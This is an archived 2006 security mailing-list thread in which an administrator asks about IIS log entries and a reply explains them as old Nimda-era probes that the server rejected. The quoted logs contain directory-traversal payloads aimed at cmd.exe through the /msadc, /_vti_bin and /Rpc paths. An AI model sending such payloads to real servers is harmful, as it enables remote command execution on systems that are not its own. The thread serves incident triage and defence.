Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Focus-Microsoft
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RE: IIS http error log entries...

from [Wayne S. Anderson] Network Security [Permanent Link]
Subject: RE: IIS http error log entries...
Date: Tue, 12 Dec 2006 22:17:00 -0700 
As most of the people have responded thus far, this is not a cause for
concern directly based on these log entries.

Essentially what is happening here is that an external user is using a
series of character strings against relatively old attack vectors that
offered methods of executing commands against the native shell in windows in
long-past versions of IIS.  From what we are seeing here, these are old
executions trying to exploit weaknesses in frontpage extensions, RPC-based
application pools, as well as the msadc folder in IIS 5.0.  Most of these
vulnerabilities have been removed over the last several years and the newest
attack vector out of those probed below is 3 or so years old (think IIS 5
timeframe).  

Speaking specifically to this log snippet, it looks like these were all
error-handled correctly and I would advise scanning your access logs as well
for any other access attempts from this source IP.

As one of the earlier posters to this thread advised, taking the time to
assess your IT policy would be a good idea, particularly when it comes to
considering policies on log auditing and possibly using some budget to hire
or internally execute a penetration test against your servers.
--------------------------------------
Wayne S. Anderson
"An sufficiently developed bug is indistinguisable from a feature."
http://www.linkedin.com/in/wayneanderson 

-----Original Message-----
From: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com] On
Behalf Of nemanja.janic@centroproizvod.co.yu
Sent: Tuesday, December 12, 2006 8:02 AM
To: focus-ms@securityfocus.com
Subject: IIS http error log entries...

Hello list,
i hope i got the right group, 
i just found these in my IIS logs:

-----------------------

2006-12-08 11:38:18 87.17.7.5 2842 192.168.x.x 80 HTTP/1.0 HEAD
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 -
URL -
2006-12-08 11:38:29 87.17.7.5 2929 192.168.x.x 80 HTTP/1.0 HEAD
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 2872 192.168.x.x 80 HTTP/1.0 HEAD
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL
-
2006-12-08 11:38:44 87.17.7.5 3420 192.168.x.x 80 HTTP/1.0 HEAD
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 1332 192.168.x.x 80 HTTP/1.0 HEAD
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd
.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 2105 192.168.x.x 80 HTTP/1.0 HEAD
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+di
r+c:\ 400 - URL -
2006-12-08 11:39:46 87.17.7.5 2435 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:40:36 87.17.7.5 1933 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:40:41 87.17.7.5 4144 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:40:44 87.17.7.5 4234 192.168.x.x 80 HTTP/1.0 HEAD
/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 -
URL -
2006-12-08 11:40:50 87.17.7.5 1130 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
400 - URL -
2006-12-08 11:40:50 87.17.7.5 1411 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 400 -
URL -
2006-12-08 11:41:11 87.17.7.5 1427 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:41:24 87.17.7.5 4715 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:35 87.17.7.5 1568 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
400 - URL -
2006-12-08 11:41:41 87.17.7.5 4751 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:41:44 87.17.7.5 1595 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -

-------------------------

I don't have much expirience with this kind of thing, and from digging the
net i found that this was used in Nimda attacks few years ago... any idea
what's going on? Should i be worried?

---------------------------------------------------------------------------
---------------------------------------------------------------------------


---------------------------------------------------------------------------
---------------------------------------------------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: strange new virus, Kevin
Next by Date:  Re: IIS http error log entries..., nemanja . janic
Previous by Thread:  IIS http error log entries..., nemanja . janic
Next by Thread:  RE: IIS http error log entries..., Vick, Ryan
Indexes:  [Date] [Thread] [Top] [All Lists]